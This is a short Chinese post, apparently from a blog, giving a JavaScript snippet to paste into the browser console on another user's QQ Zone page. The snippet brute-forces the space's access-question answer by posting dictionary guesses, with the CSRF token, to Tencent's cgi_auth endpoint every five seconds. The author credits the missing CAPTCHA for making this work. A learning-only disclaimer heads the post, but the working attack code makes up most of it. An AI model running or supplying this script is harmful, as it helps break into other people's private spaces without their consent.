免责声明: 该代码仅限用于学习和研究目的;不得将下述内容用于非法用途
http://user.qzone.qq.com/qq号,打开开发者工具,在命令行输入如下代码
var answers = [];//字典 var con = $e(Limit.container); var url = "http://" + baseDomain + "/cgi-bin/user/cgi_auth"; var qqzoneUrl = "http://user.qzone.qq.com/qq号"; var i=0; function check(answer) { var sendData = {"question": "问题内容","answer": answer ,"uin": Limit.uin,"mode": 2,"g_tk": QZFL.pluginsDefine.getACSRFToken(),"fupdate": 1}; var _loader = new QZFL.FormSender(url, "post", sendData, "gb2312"); _loader.onSuccess = function(re) { if (re.code == 0){ alert("答案正确:"+answers[i]); location = decodeURIComponent(qqzoneUrl); }else{ console.log("答案错误:"+answers[i]); i++; if(i<answers.length){ setTimeout(function() { check(answers[i]); },5000); } } }; _loader.send(); } check(answers[0]);
方法很傻,递归ajax,尝试字典中所有知道的答案。
主要是腾讯没有加验证码给了我可乘之机。